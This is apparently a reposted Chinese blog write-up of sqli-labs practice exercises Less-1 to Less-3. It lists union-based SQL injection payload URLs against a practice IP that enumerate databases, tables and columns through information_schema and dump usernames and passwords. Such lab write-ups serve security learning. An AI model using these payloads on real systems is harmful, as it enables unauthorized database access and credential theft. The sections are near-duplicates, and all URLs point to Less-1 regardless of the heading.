sql注入1到3

其他 2021-03-28 17:33:25 阅读次数: 0

sql注入练习

Less-1

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(字符型注入)
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询security中users内的列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名,密码

Less-2

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(报错,存在注入点)(数值型注入)
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
得到用户名,密码

Less-3

1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(报错,存在注入点)
?id=1 and 1=2 未报错,不是数值型
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名,密码

猜你喜欢

转载自blog.csdn.net/weixin_50998641/article/details/110248270
今日推荐
周排行
成为C++高手之宏与枚举
在CAD二次开发中使用进度条
Js插件ECharts,HighCharts学习网址整理
Celery提交任务出错(on windows.)
cephfs内核客户端性能追踪
thinkphp中PHPExcel用法
EntityFramework动态组合多排序字段
汇编语言(八)实验9 根据材料编程
安装ubuntu后必须做的事情(对我而言)
JS函数式编程
每日归档
更多
2024-10-22(0)
2024-10-21(0)
2024-10-20(0)
2024-10-19(0)
2024-10-18(0)
2024-10-17(0)
2024-10-16(0)
2024-10-15(0)
2024-10-14(0)
2024-10-13(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022